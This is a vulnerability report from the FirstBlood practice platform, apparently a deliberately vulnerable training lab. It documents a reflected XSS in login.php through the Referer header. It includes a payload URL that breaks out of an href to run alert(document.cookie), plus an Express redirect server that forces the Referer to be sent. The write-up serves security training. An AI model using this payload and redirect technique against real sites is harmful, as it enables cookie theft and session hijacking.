FirstBlood-#583Reflective XSS via Referer on login.php endpoint
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-26, panya Level 7 reported:

The site contains is vulnerable to Reflective XSS on the /login.php endpoint. It reflects the Referer header value inside the "Return to previous page" link's href (in single quotes).

Steps to reproduce:

  1. Open this url http://ztn.me/test'onclick=alert(document.cookie);return(false)//

It is hosted on my server:

const express = require('express');

const app = express();

app.get('*', (req, res) => {
  res.set('Referrer-Policy', 'unsafe-url');
  res.set('Content-Type', 'text/html');
  res.end('<script>location.replace("https://fcde991cdbc2-panya.a.firstbloodhackers.com/login.php");</script>');
});

app.listen(80);
  1. The browser will redirect you to https://fcde991cdbc2-panya.a.firstbloodhackers.com/login.php
  2. Click on the "Return to previous page" link.

Actual result:

There will be an alert with the user's document.cookie value (doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9 in our case).

Expected result:

The Referer header's value should be properly escaped or sanitized. The alert should not be shown.

Impact:

An attacker could execute JS code on behalf of a user of this site.

P3 Medium

Endpoint: /login.php

Parameter: Referer:

Payload: http://ztn.me/test'onclick=alert(document.cookie);return(false)//


FirstBlood ID: 19
Vulnerability Type: Reflective XSS

The parameter ?ref= on login.php was fixed and instead the use of $_SERVER['HTTP_REFERER']; was used. Patrice tested in Chrome and Firefox and saw it was secure, but some users still use Internet Explorer 10 (governments for example!) and the Referer header is vulnerable to reflective XSS.

Report Feedback

@zseano

Creator & Administrator


Nice panya! Fun fact, Even though the referrer is vulnerable, on a lot of the reports for this the payload provided simply wouldn't work (use of < > etc). So kudos for providing a working PoC. Actually for me when testing it would only work on IE as it seems for me on latest version of Chrome/FF the ' character is now filtered. I'll play some more though and may update this bug description